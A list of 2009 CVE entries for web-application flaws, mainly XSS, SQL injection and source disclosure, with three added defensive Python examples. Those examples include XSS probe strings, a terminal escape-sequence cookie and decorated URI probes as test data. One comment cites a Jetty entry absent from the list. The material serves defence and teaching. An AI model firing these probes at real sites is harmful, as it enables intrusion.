[CVE-2009-4562] Cross-site scripting (XSS) vulnerability in zp-core/admin.php in Zenphoto 1.2.5 allows remote attackers to inject arbitrary web script or HTML via the from parameter.
[CVE-2009-4561] Multiple SQL injection vulnerabilities in Admin/index.php in WebLeague 2.2.0, when magic_quotes_gpc is disabled, allow remote attackers to execute arbitrary SQL commands via the (1) username and (2) password parameters.
[CVE-2009-4560] SQL injection vulnerability in profile.php in WebLeague 2.2.0 allows remote attackers to execute arbitrary SQL commands via the name parameter.
[CVE-2009-4559] Cross-site scripting (XSS) vulnerability in the Submitted By module 6.x before 6.x-1.3 for Drupal allows remote authenticated users, with "administer content types" privileges, to inject arbitrary web script or HTML via an input string for "submitted by" text.
[CVE-2009-4557] Cross-site scripting (XSS) vulnerability in the Image Assist module 5.x-1.x before 5.x-1.8, 5.x-2.x before 2.0-alpha4, 6.x-1.x before 6.x-1.1, 6.x-2.x before 2.0-alpha4, and 6.x-3.x-dev before 2009-07-15, a module for Drupal, allows remote authenticated users, with image-node creation privileges, to inject arbitrary web script or HTML via a node title.
[CVE-2009-4554] Multiple cross-site scripting (XSS) vulnerabilities in Snitz Forums 2000 3.4.07 allow remote attackers to inject arbitrary web script or HTML via (1) the url parameter to pop_send_to_friend.asp, related to a crafted onload attribute of an IMG element
[CVE-2009-4552] Cross-site scripting (XSS) vulnerability in the Survey Pro module for Miniweb 2.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to index.php.
[CVE-2009-4551] SQL injection vulnerability in the Survey Pro module for Miniweb 2.0 allows remote attackers to execute arbitrary SQL commands via the campaign_id parameter in a results action to index.php.
[CVE-2009-4548] Multiple cross-site scripting (XSS) vulnerabilities in ViArt Helpdesk 3.x allow remote attackers to inject arbitrary web script or HTML via the category_id parameter to (1) products.php, (2) article.php, (3) product_details.php, or (4) reviews.php.
[CVE-2009-4547] Multiple cross-site scripting (XSS) vulnerabilities in ViArt CMS 3.x allow remote attackers to inject arbitrary web script or HTML via the (1) category_id parameter to forums.php, or the forum_id parameter to (2) forum.php or (3) forum_topic_new.php.
[CVE-2009-4545] Logoshows BBS 2.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for database/globepersonnel.mdb.
[CVE-2009-4544] Cross-site scripting (XSS) vulnerability in kbase/kbase.php in Cromosoft Technologies Facil Helpdesk 2.3 Lite allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
[CVE-2009-4542] Cross-site scripting (XSS) vulnerability in newticket.php in IsolSoft Support Center 2.5 allows remote attackers to inject arbitrary web script or HTML via the lang parameter.
[CVE-2009-4539] Cross-site scripting (XSS) vulnerability in main.php in SQLiteManager 1.2.0 allows remote attackers to inject arbitrary web script or HTML via the redirect parameter.
[CVE-2009-4535] Mongoose 2.8.0 and earlier allows remote attackers to obtain the source code for a web page by appending a / (slash) character to the URI.
[CVE-2009-4534] Open redirect vulnerability in the FAQ Ask module 5.x and 6.x before 6.x-2.0, a module for Drupal, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
[CVE-2009-4533] The Webform module 5.x before 5.x-2.8 and 6.x before 6.x-2.8, a module for Drupal, does not prevent caching of a page that contains token placeholders for a default value, which allows remote attackers to read session variables via unspecified vectors.
[CVE-2009-4532] Cross-site scripting (XSS) vulnerability in the Webform module 5.x before 5.x-2.8 and 6.x before 6.x-2.8, a module for Drupal, allows remote authenticated users, with webform creation privileges, to inject arbitrary web script or HTML via a field label.
[CVE-2009-4531] httpdx 1.4.4 and earlier allows remote attackers to obtain the source code for a web page by appending a . (dot) character to the URI.
[CVE-2009-4530] Mongoose 2.8.0 and earlier allows remote attackers to obtain the source code for a web page by appending ::$DATA to the URI.
[CVE-2009-4529] InterVations NaviCOPA Web Server 3.0.1.2 and earlier allows remote attackers to obtain the source code for a web page via a trailing encoded space character in a URI, as demonstrated by /index.html%20 and /index.php%20 URIs.
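The four source-disclosure entries directly above (Mongoose, httpdx, NaviCOPA) share one root cause: the server decides "is this a script to execute?" on the raw URI string, while the filesystem open() silently ignores a trailing "/", ".", an encoded space or an NTFS "::$DATA" suffix and hands back the script source. The check below is an added example, not code from any of those servers; the SCRIPT_EXTS set and the three-way classification are assumptions for the illustration.

```python
"""Canonicalise a request path before deciding how to serve it.

Added example, not code from Mongoose, httpdx or NaviCOPA. The point is to
derive the decision ("execute" vs "stream bytes") from the file name the OS
will actually open, not from the raw URI.
"""
import re
from urllib.parse import unquote

# Extensions that must be executed, never streamed as bytes (assumed set).
SCRIPT_EXTS = {".php", ".asp", ".aspx", ".jsp", ".cgi", ".pl"}

_ADS_SUFFIX = re.compile(r"::\$[A-Za-z0-9_]+$")   # NTFS alternate data stream, e.g. ::$DATA
_TRAILING_JUNK = re.compile(r"[ ./\\]+$")         # trailing spaces, dots and separators


def _raw_path(uri: str) -> str:
    """Percent-decode, drop the query string, normalise backslashes."""
    return unquote(uri).split("?", 1)[0].replace("\\", "/")


def canonical_basename(uri: str) -> str:
    """The file name the OS would actually open for this URI (lower-cased)."""
    path = _ADS_SUFFIX.sub("", _raw_path(uri))
    path = _TRAILING_JUNK.sub("", path)
    return path.rsplit("/", 1)[-1].lower()


def classify(uri: str) -> str:
    """Return 'script', 'static' or 'reject'.

    'reject' means the canonical target is a script but the URI reached it
    through a decoration (trailing '/', '.', space or ::$DATA) that a
    string-based dispatcher would have missed. PATH_INFO-style routing such
    as /index.php/extra is out of scope for this example.
    """
    canon = canonical_basename(uri)
    raw_base = _raw_path(uri).rsplit("/", 1)[-1].lower()
    ext = canon[canon.rfind("."):] if "." in canon else ""
    if ext in SCRIPT_EXTS:
        return "script" if raw_base == canon else "reject"
    return "static"


if __name__ == "__main__":
    # Constructed probes modelled on the vectors in the entries above.
    for probe in ("/index.php", "/index.php/", "/index.php.",
                  "/index.php::$DATA", "/index.php%20", "/logo.png"):
        print(f"{probe:22} -> {classify(probe)}")
```

The useful property is that every decorated form collapses to the same canonical name, so a single comparison catches all four vendors' variants at once; a server that instead adds one special case per reported suffix will keep shipping the next one.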
[CVE-2009-4527] The Shibboleth authentication module 5.x before 5.x-3.4 and 6.x before 6.x-3.2, a module for Drupal, does not properly remove statically granted privileges after a logout or other session change, which allows physically proximate attackers to gain privileges by using an unattended web browser.
[CVE-2009-4525] Cross-site scripting (XSS) vulnerability in the Print (aka Printer, e-mail and PDF versions) module 5.x before 5.x-4.9 and 6.x before 6.x-1.9, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via crafted data in a list of links.
[CVE-2009-4524] Cross-site scripting (XSS) vulnerability in the RealName module 6.x-1.x before 6.x-1.3 for Drupal allows remote attackers to inject arbitrary web script or HTML via a realname (aka real name) element.
[CVE-2009-4523] Cross-site scripting (XSS) vulnerability in index.php in Zainu 1.0 allows remote attackers to inject arbitrary web script or HTML via the searchSongKeyword parameter in a SearchSong action.
[CVE-2009-4522] Cross-site scripting (XSS) vulnerability in search.5.html in BloofoxCMS 0.3.5 allows remote attackers to inject arbitrary web script or HTML via the search parameter to index.php. NOTE: some of these details are obtained from third party information.
[CVE-2009-4521] Cross-site scripting (XSS) vulnerability in birt-viewer/run in Eclipse Business Intelligence and Reporting Tools (BIRT) before 2.5.0, as used in KonaKart and other products, allows remote attackers to inject arbitrary web script or HTML via the __report parameter.
[CVE-2009-4518] Cross-site scripting (XSS) vulnerability in the Insert Node module 5.x before 5.x-1.2 for Drupal allows remote attackers to inject arbitrary web script or HTML via an inserted node.
[CVE-2009-4516] Cross-site scripting (XSS) vulnerability in the FAQ Ask module 5.x and 6.x before 6.x-2.0, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4514] Cross-site scripting (XSS) vulnerability in the OpenSocial Shindig-Integrator module 5.x and 6.x before 6.x-2.1, a module for Drupal, allows remote authenticated users, with "create application" privileges, to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4513] Multiple cross-site scripting (XSS) vulnerabilities in the Workflow module 5.x before 5.x-2.4 and 6.x before 6.x-1.2, a module for Drupal, allow remote authenticated users, with "administer workflow" privileges, to inject arbitrary web script or HTML via the name of a (1) workflow or (2) workflow state.
[CVE-2009-4509] The administrative web console on the TANDBERG Video Communication Server (VCS) before X4.3 uses predictable session cookies in (1) tandberg/web/lib/secure.php and (2) tandberg/web/user/lib/secure.php, which makes it easier for remote attackers to bypass authentication, and execute arbitrary code by loading a custom software update, via a crafted "Cookie: tandberg_login=" HTTP header.
[CVE-2009-4505] Multiple cross-site scripting (XSS) vulnerabilities in OpenCMS OAMP Comments Module 1.0.1 allow remote attackers to inject arbitrary web script or HTML via the name field in a comment, and other unspecified vectors.
[CVE-2009-4497] Cross-site scripting (XSS) vulnerability in LXR Cross Referencer 0.9.5 and 0.9.6 allows remote attackers to inject arbitrary web script or HTML via the i parameter to the ident program.
[CVE-2009-4492] WEBrick 1.3.1 in Ruby 1.8.6 through patchlevel 383, 1.8.7 through patchlevel 248, 1.8.8dev, 1.9.1 through patchlevel 376, and 1.9.2dev writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to modify a window's title, or possibly execute arbitrary commands or overwrite files, via an HTTP request containing an escape sequence for a terminal emulator.
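The Jetty entry (CVE-2009-4611) and the WEBrick entry directly above describe the same bug: attacker-controlled bytes (a cookie value, a header, a query string) are copied verbatim into a log that an operator later views with tail, less or cat in a terminal that honours escape sequences. The sanitiser below is an added example, not Jetty or WEBrick code; the log field layout and the sample request are constructed for the illustration.

```python
"""Neutralise terminal escape sequences before a request reaches a log file.

Added example, not Jetty or WEBrick code. Every attacker-influenced field is
passed through sanitize_for_log() so the file can be viewed in a terminal
without the terminal interpreting the content.
"""
import re

# C0 controls (0x00-0x1f), DEL (0x7f) and C1 controls (0x80-0x9f). C1 matters
# because U+009B is a single-character CSI that some terminals honour even
# when no 0x1b byte is present.
_CONTROL = re.compile(r"[\x00-\x1f\x7f-\x9f]")
_ESCAPE_INTRODUCER = re.compile(r"[\x1b\x9b\x9d]")  # ESC, CSI, OSC


def sanitize_for_log(text: str) -> str:
    """Replace every control character with a visible \\xNN escape.
    Printable text is untouched, so the log stays greppable."""
    return _CONTROL.sub(lambda m: "\\x%02x" % ord(m.group()), text)


def has_terminal_escape(text: str) -> bool:
    """Cheap detector for the specific vector in these entries: an escape
    introducer that could retitle the window or emit a control sequence."""
    return _ESCAPE_INTRODUCER.search(text) is not None


def access_log_line(client: str, request_line: str, status: int, headers: dict) -> str:
    """Build one log record with every attacker-influenced field sanitised.
    The field layout is an assumption for the example, not either project's format."""
    fields = [client, sanitize_for_log(request_line), str(status)]
    for name in ("Content-Length", "Cookie"):
        fields.append(f'{name}="{sanitize_for_log(headers.get(name, "-"))}"')
    return " ".join(fields)


if __name__ == "__main__":
    # Constructed request: OSC 0 sets the terminal title, BEL terminates it.
    evil_cookie = "Age=\x1b]0;owned by attacker\x07"
    line = access_log_line("203.0.113.7", "GET /cookie/ HTTP/1.1", 200,
                           {"Cookie": evil_cookie, "Content-Length": "abc"})
    print("raw cookie has escape:", has_terminal_escape(evil_cookie))
    print(line)
```

Escaping rather than deleting is deliberate: a stripped log loses the evidence that someone was probing, while the \x1b form is both harmless to a terminal and easy to alert on.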
[CVE-2009-4480] Buffer overflow in the web service in AzeoTech DAQFactory 5.77 might allow remote attackers to execute arbitrary code via unspecified vectors, as demonstrated by a certain module in VulnDisco Pack Professional 7.16 through 8.11. NOTE: as of 20091229, this disclosure has no actionable information. However, because the VulnDisco Pack author is a reliable researcher, the issue is being assigned a CVE identifier for tracking purposes.
[CVE-2009-4478] Multiple cross-site scripting (XSS) vulnerabilities in Xstate Real Estate 1.0 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) home.html or (2) lands.html.
[CVE-2009-4473] Multiple cross-site scripting (XSS) vulnerabilities in WorkArea/ContentDesigner/ekformsiframe.aspx in Ektron CMS400.NET 7.6.1.53 and 7.6.6.47, and possibly 7.52 through 7.66sp2, allow remote attackers to inject arbitrary web script or HTML via the (1) css, (2) eca, (3) id, and (4) skin parameters. NOTE: some of these details are obtained from third party information.
[CVE-2009-4469] Multiple cross-site scripting (XSS) vulnerabilities in pagenumber.inc.php in phpPowerCards 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) PATH_INFO, the (2) archiv parameter, and the (3) subcat parameter.
[CVE-2009-4468] Cross-site scripting (XSS) vulnerability in misc.php in DeluxeBB 1.3 allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2009-4465] DeluxeBB 1.3 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain user and configuration information, log data, and gain administrative access via a direct request to scripts in (1) templates/ including (2) templates/deluxe/admincp/, (3) templates/corporate/admincp/, and (4) templates/blue/admincp/.
[CVE-2009-4464] Cross-site scripting (XSS) vulnerability in searchadvance.asp in Active Business Directory 2 allows remote attackers to inject arbitrary web script or HTML via the search parameter.
[CVE-2009-4463] Intellicom NetBiter WebSCADA devices use default passwords for the HICP network configuration service, which makes it easier for remote attackers to modify network settings and cause a denial of service. NOTE: this is only a vulnerability when the administrator does not follow recommendations in the product's installation documentation. NOTE: this issue was originally reported to be hard-coded passwords, not default passwords.
[CVE-2009-4462] Stack-based buffer overflow in the NetBiterConfig utility (NetBiterConfig.exe) 1.3.0 for Intellicom NetBiter WebSCADA allows remote attackers to execute arbitrary code via a long hn (hostname) parameter in a crafted HICP-protocol UDP packet.
[CVE-2009-4461] Multiple cross-site scripting (XSS) vulnerabilities in FlatPress 0.909 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) contact.php, (2) login.php, and (3) search.php.
[CVE-2009-4460] Multiple cross-site scripting (XSS) vulnerabilities in Auto-Surf Traffic Exchange Script 1.1 allow remote attackers to inject arbitrary web script or HTML via the rid parameter to (1) index.php, (2) faq.php, and (3) register.php.
[CVE-2009-4458] Multiple cross-site scripting (XSS) vulnerabilities in FreePBX 2.5.2 and 2.6.0rc2, and possibly other versions, allow remote attackers to inject arbitrary web script or HTML via the (1) tech parameter to admin/admin/config.php during a trunks display action, the (2) description parameter during an Add Zap Channel action, and (3) unspecified vectors during an Add Recordings action.
[CVE-2009-4457] Multiple unspecified vulnerabilities in the Vsftpd Webmin module before 1.3b for the Vsftpd server have unknown impact and attack vectors related to "Some security issues."
[CVE-2009-4455] The default configuration of Cisco ASA 5500 Series Adaptive Security Appliance (Cisco ASA) 7.0, 7.1, 7.2, 8.0, 8.1, and 8.2 allows portal traffic to access arbitrary backend servers, which might allow remote authenticated users to bypass intended access restrictions and access unauthorized web sites via a crafted URL obfuscated with ROT13 and a certain encoding. NOTE: this issue was originally reported as a vulnerability related to lack of restrictions to URLs listed in the Cisco WebVPN bookmark component, but the vendor states that "The bookmark feature is not a security feature."
[CVE-2009-4450] Multiple cross-site scripting (XSS) vulnerabilities in map.php in LiveZilla 3.1.8.3 allow remote attackers to inject arbitrary web script or HTML via the (1) lat, (2) lng, and (3) zom parameters, which are not properly handled when processed with templates/map.tpl.
[CVE-2009-4446] Cross-site scripting (XSS) vulnerability in admin.php in phpInstantGallery 1.1 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
[CVE-2009-4436] Multiple SQL injection vulnerabilities in Active Web Softwares eWebquiz 8 allow remote attackers to execute arbitrary SQL commands via the QuizID parameter to (1) questions.asp, (2) importquestions.asp, and (3) quiztakers.asp, different vectors than CVE-2007-1706.
[CVE-2009-4433] Multiple cross-site scripting (XSS) vulnerabilities in IDevSpot iSupport 1.8 and earlier allow remote attackers to inject arbitrary web script or HTML via the (a) 5 or (b) 9 field in a post action to ticket_function.php, reachable through ticket_submit.php and index.php.
[CVE-2009-4429] Cross-site scripting (XSS) vulnerability in the Sections module 5.x before 5.x-1.3 and 6.x before 6.x-1.3 for Drupal allows remote authenticated users with "administer sections" privileges to inject arbitrary web script or HTML via a section name (aka the Name field).
[CVE-2009-4425] Cross-site scripting (XSS) vulnerability in index.php in iDevCart 1.09 allows remote attackers to inject arbitrary web script or HTML via the SEARCH parameter in a browse action.
[CVE-2009-4422] Multiple cross-site scripting (XSS) vulnerabilities in the GetURLArguments function in jpgraph.php in Aditus Consulting JpGraph 3.0.6 allow remote attackers to inject arbitrary web script or HTML via a key to csim_in_html_ex1.php, and other unspecified vectors.
[CVE-2009-4416] Cross-site scripting (XSS) vulnerability in login.php in phpGroupWare 0.9.16.12, and possibly other versions before 0.9.16.014, allows remote attackers to inject arbitrary web script or HTML via an arbitrary parameter whose name begins with the "phpgw_" sequence.
[CVE-2009-4408] Multiple cross-site scripting (XSS) vulnerabilities in models.parser in PyForum 1.0.3 and possibly earlier versions, and possibly zForum, allow remote attackers to inject arbitrary web script or HTML via crafted BBcode (1) img or (2) url tags, which are not properly handled when a post is viewed.
[CVE-2009-4406] Cross-site scripting (XSS) vulnerability in Forms/login1 in American Power Conversion (APC) Switched Rack PDU AP7932 B2, running rpdu 3.3.3 or 3.7.0 on AOS 3.3.4, and possibly other versions, allows remote attackers to inject arbitrary web script or HTML via the login_username parameter.
[CVE-2009-4403] Cross-site scripting (XSS) vulnerability in index.php in Rumba XML 1.8 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. NOTE: some of these details are obtained from third party information.
[CVE-2009-4402] The default configuration of SQL-Ledger 2.8.24 allows remote attackers to perform unspecified administrative operations by providing an arbitrary password to the admin interface.
[CVE-2009-4400] Cross-site scripting (XSS) vulnerability in the Parish Administration Database (ste_parish_admin) extension 0.1.3 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4398] Cross-site scripting (XSS) vulnerability in the Parish of the Holy Spirit Religious Art Gallery (hs_religiousartgallery) extension 0.1.2 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4397] Cross-site scripting (XSS) vulnerability in the Diocese of Portsmouth Resources Database (pd_resources) extension 0.1.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4395] Cross-site scripting (XSS) vulnerability in the Random Prayer 2 (ste_prayer2) extension 0.0.3 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4391] Cross-site scripting (XSS) vulnerability in the File list (dr_blob) extension 2.1.1 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4388] Cross-site scripting (XSS) vulnerability in the ListMan (nl_listman) extension 1.2.1 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4387] The cross-site scripting (XSS) protection mechanism in ShowInContentAreaAction.do in ManageEngine Password Manager Pro (PMP) before 6.1 Build 6104 uses case-sensitive checks for malicious inputs, which allows remote attackers to inject arbitrary web script or HTML via the searchtext parameter and other unspecified inputs.
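The Password Manager Pro entry directly above is a reminder that a case-sensitive input blocklist is not an XSS defence: changing letter case in the marker defeats it. Folding case closes that specific hole but the list stays incomplete; the fix that holds is to encode output for the context it lands in. The snippet below is an added example, not ManageEngine code; the BLOCKLIST tokens and the h2 wrapper are assumptions for the illustration.

```python
"""Why a case-sensitive blocklist is not an XSS defence.

Added example, not ManageEngine code. Three checks side by side: the flawed
case-sensitive blocklist, a case-folded one, and unconditional output
encoding, which is the only one of the three that does not depend on
guessing the attacker's spelling.
"""
import html

# Tokens a typical blocklist watches for (assumed for the example).
BLOCKLIST = ("<script", "javascript:", "onerror=")


def blocklist_case_sensitive(value: str) -> bool:
    """The flawed check: matches only the exact spelling of each token."""
    return any(token in value for token in BLOCKLIST)


def blocklist_case_folded(value: str) -> bool:
    """Fixes the case bypass, but still only catches what is on the list."""
    folded = value.casefold()
    return any(token in folded for token in BLOCKLIST)


def render_search_header(searchtext: str) -> str:
    """Hardened: HTML-encode for the element-content context, unconditionally.
    The surrounding markup is an assumption for the example."""
    return "<h2>Results for: %s</h2>" % html.escape(searchtext, quote=True)


if __name__ == "__main__":
    probes = [
        "<script>alert(1)</script>",          # caught by both blocklists
        "<ScRiPt>alert(1)</ScRiPt>",          # bypasses the case-sensitive one
        "<img src=x OnErRoR=alert(1)>",       # case-folding catches this one
        "<svg onload=alert(1)>",              # on neither list: blocklists leak
    ]
    for p in probes:
        print(f"{blocklist_case_sensitive(p)!s:5} {blocklist_case_folded(p)!s:5} {render_search_header(p)}")
```

Note that html.escape is correct only for element content and quoted attribute values; a value placed into a URL, a JavaScript string or a CSS property needs the encoder for that context instead.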
[CVE-2009-4384] Multiple cross-site scripting (XSS) vulnerabilities in Scriptsez.net Ez Poll Hoster (EPH) allow remote attackers to inject arbitrary web script or HTML via the (1) pid parameter in a code action to index.php and the (2) uid parameter in a view action to profile.php.
[CVE-2009-4382] Cross-site scripting (XSS) vulnerability in module.php in PHPFABER CMS, possibly 1.3.36, allows remote attackers to inject arbitrary web script or HTML via the mod parameter.
[CVE-2009-4381] Cross-site scripting (XSS) vulnerability in index.php in texmedia Million Pixel Script 3 allows remote attackers to inject arbitrary web script or HTML via the pa parameter. NOTE: some of these details are obtained from third party information.
[CVE-2009-4380] Multiple SQL injection vulnerabilities in Valarsoft Webmatic before 3.0.3 allow remote attackers to execute arbitrary SQL commands via unspecified vectors, a different issue than CVE-2008-2925.
[CVE-2009-4379] Multiple cross-site scripting (XSS) vulnerabilities in Valarsoft Webmatic before 3.0.3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different issue than CVE-2008-2924.
[CVE-2009-4371] Cross-site scripting (XSS) vulnerability in the Locale module (modules/locale/locale.module) in Drupal Core 6.14, and possibly other versions including 6.15, allows remote authenticated users with "administer languages" permissions to inject arbitrary web script or HTML via the (1) Language name in English or (2) Native language name fields in the Custom language form.
[CVE-2009-4370] Cross-site scripting (XSS) vulnerability in the Menu module (modules/menu/menu.admin.inc) in Drupal Core 6.x before 6.15 allows remote authenticated users with permissions to create new menus to inject arbitrary web script or HTML via a menu description, which is not properly handled in the menu administration overview.
[CVE-2009-4369] Cross-site scripting (XSS) vulnerability in the Contact module (modules/contact/contact.admin.inc or modules/contact/contact.module) in Drupal Core 5.x before 5.21 and 6.x before 6.15 allows remote authenticated users with "administer site-wide contact form" permissions to inject arbitrary web script or HTML via the contact category name.
[CVE-2009-4367] The Staging Webservice ("sitecore modules/staging/service/api.asmx") in Sitecore Staging Module 5.4.0 rev.080625 and earlier allows remote attackers to bypass authentication and (1) upload files, (2) download files, (3) list directories, and (4) clear the server cache via crafted SOAP requests with arbitrary Username and Password values, possibly related to a direct request.
[CVE-2009-4366] Cross-site scripting (XSS) vulnerability in index.php in ScriptsEz Ez Blog 1.0 allows remote attackers to inject arbitrary web script or HTML via the yr parameter in a bmonth action.
[CVE-2009-4364] Cross-site scripting (XSS) vulnerability in index.php in ScriptsEz Ez Blog allows remote attackers to inject arbitrary web script or HTML via the cname parameter, related to the act and id parameters. NOTE: the provenance of this information is unknown.
[CVE-2009-4363] Text_Filter/lib/Horde/Text/Filter/Xss.php in Horde Application Framework before 3.3.6, Horde Groupware before 1.2.5, and Horde Groupware Webmail Edition before 1.2.5 does not properly handle data: URIs, which allows remote attackers to conduct cross-site scripting (XSS) attacks via data:text/html values for the HREF attribute of an A element in an HTML e-mail message. NOTE: the vendor states that the issue is caused by "an XSS vulnerability in Firefox browsers."
[CVE-2009-4360] SQL injection vulnerability in modules/content/index.php in the Content module 0.5 for XOOPS allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2009-4359] Cross-site scripting (XSS) vulnerability in folder.php in the SmartMedia 0.85 Beta module for XOOPS allows remote attackers to inject arbitrary web script or HTML via the categoryid parameter.
[CVE-2009-4354] TransWARE Active! mail 2003 build 2003.0139.0871 and earlier does not properly secure the session ID in a session cookie, which allows remote attackers to hijack web sessions, probably related to the "secure" flag for cookies in SSL sessions.
[CVE-2009-4353] The Mobile Edition of TransWARE Active! mail 2003 build 2003.0139.0871 and earlier, and possibly other versions before 2003.0139.0911, does not remove the session ID in a Referer URL, which allows remote attackers to hijack web sessions via vectors such as an email with an embedded URL.
[CVE-2009-4352] Multiple cross-site scripting (XSS) vulnerabilities in TransWARE Active! mail 2003 build 2003.0139.0871 and earlier, and possibly other versions before 2003.0139.0939, allow remote attackers to inject arbitrary web script or HTML via the (1) From, (2) To, (3) Cc, and (4) Bcc parameters.
[CVE-2009-4348] Cross-site scripting (XSS) vulnerability in index.php in Harold Bakker's NewsScript (HB-NS) 1.3 allows remote attackers to inject arbitrary web script or HTML via the topic parameter in a topic action, a different vector than CVE-2006-2146.
[CVE-2009-4347] Cross-site scripting (XSS) vulnerability in daloradius-users/login.php in daloRADIUS 0.9-8 and earlier allows remote attackers to inject arbitrary web script or HTML via the error parameter.
[CVE-2009-4346] Cross-site scripting (XSS) vulnerability in the Frontend news submitter with RTE (fe_rtenews) extension 1.4.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4345] Cross-site scripting (XSS) vulnerability in the vShoutbox (vshoutbox) extension 0.0.1 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4344] Cross-site scripting (XSS) vulnerability in the ZID Linkliste (zid_linklist) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4343] Cross-site scripting (XSS) vulnerability in the Training Company Database (trainincdb) extension 0.4.7 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4340] Cross-site scripting (XSS) vulnerability in the No indexed Search (no_indexed_search) extension 0.2.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4336] Cross-site scripting (XSS) vulnerability in the Diocese of Portsmouth Calendar (pd_calendar) extension 0.4.1 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4325] The Client Interfaces component in IBM DB2 8.2 before FP18, 9.1 before FP8, 9.5 before FP5, and 9.7 before FP1 does not validate an unspecified pointer, which allows attackers to overwrite "external memory" via unknown vectors, related to a missing "check for null pointers."
[CVE-2009-4320] Cross-site scripting (XSS) vulnerability in searchform.php in The Next Generation of Genealogy Sitebuilding (TNG) 7.1.2 allows remote attackers to inject arbitrary web script or HTML via the msg parameter.
[CVE-2009-4318] Cross-site scripting (XSS) vulnerability in index.php in Real Estate Manager 1.0.1 allows remote attackers to inject arbitrary web script or HTML via the lang parameter. NOTE: some of these details are obtained from third party information.
[CVE-2009-4317] Cross-site scripting (XSS) vulnerability in index.php in ScriptsEz Ez Cart allows remote attackers to inject arbitrary web script or HTML via the sid parameter in a showcat action.
[CVE-2009-4316] Cross-site scripting (XSS) vulnerability in searchresults_main.php in ZeeLyrics 3x allows remote attackers to inject arbitrary web script or HTML via the keyword parameter. NOTE: the provenance of this information is unknown.
[CVE-2009-4266] Cross-site scripting (XSS) vulnerability in search.php in YABSoft Advanced Image Hosting (AIH) Script 2.2, and possibly 2.3, allows remote attackers to inject arbitrary web script or HTML via the text parameter.
[CVE-2009-4255] Cross-site scripting (XSS) vulnerability in the You!Hostit! template 1.0.1 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the created_by_alias parameter in index.php.
[CVE-2009-4253] Cross-site scripting (XSS) vulnerability in dspStats.php in PowerPhlogger 2.2.5 allows remote attackers to inject arbitrary web script or HTML via the edit parameter.
[CVE-2009-4252] Cross-site scripting (XSS) vulnerability in images.php in Image Hosting Script DPI 1.1 Final (1.1F) allows remote attackers to inject arbitrary web script or HTML via the date parameter. NOTE: some of these details are obtained from third party information.
[CVE-2009-4250] Multiple cross-site scripting (XSS) vulnerabilities in CutePHP CuteNews 1.4.6 and UTF-8 CuteNews before 8b allow remote attackers to inject arbitrary web script or HTML via (1) the result parameter to register.php
[CVE-2009-4249] Multiple cross-site scripting (XSS) vulnerabilities in CutePHP CuteNews 1.4.6, when register_globals is enabled and magic_quotes_gpc is disabled, allow remote attackers to inject arbitrary web script or HTML via the (1) lastusername and (2) mod parameters to index.php
[CVE-2009-4246] Stack-based buffer overflow in RealNetworks RealPlayer 10, RealPlayer 10.5 6.0.12.1040 through 6.0.12.1741, RealPlayer 11 11.0.0 through 11.0.4, RealPlayer Enterprise, Mac RealPlayer 10 and 10.1, Linux RealPlayer 10, and Helix Player 10.x allows user-assisted remote attackers to execute arbitrary code via a malformed .RJS skin file that contains a web.xmb file with crafted length values.
[CVE-2009-4239] Cross-site scripting (XSS) vulnerability in the Web console in IBM InfoSphere Information Server 8.1 before FP1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4237] Multiple cross-site scripting (XSS) vulnerabilities in TestLink before 1.8.5 allow remote attackers to inject arbitrary web script or HTML via (1) the req parameter to login.php, and allow remote authenticated users to inject arbitrary web script or HTML via (2) the key parameter to lib/general/staticPage.php, (3) the tableName parameter to lib/attachments/attachmentupload.php, or the (4) startDate, (5) endDate, or (6) logLevel parameter to lib/events/eventviewer.php.
[CVE-2009-4234] Cross-site scripting (XSS) vulnerability in loginpages/error_user.shtml on the Micronet Network Access Controller SP1910 allows remote attackers to inject arbitrary web script or HTML via the msg parameter.
[CVE-2009-4233] Cross-site scripting (XSS) vulnerability in modules/mod_yj_whois.php in the YJ Whois component 1.0x and 1.5.x for Joomla! allows remote attackers to inject arbitrary web script or HTML via the domain parameter to index.php. NOTE: some of these details are obtained from third party information.
[CVE-2009-4229] Multiple SQL injection vulnerabilities in ActiveWebSoftwares Active Bids allow remote attackers to execute arbitrary SQL commands via (1) the catid parameter in the PATH_INFO to the default URI or (2) the catid parameter to default.asp. NOTE: this might overlap CVE-2009-0429.3. NOTE: the provenance of this information is unknown.
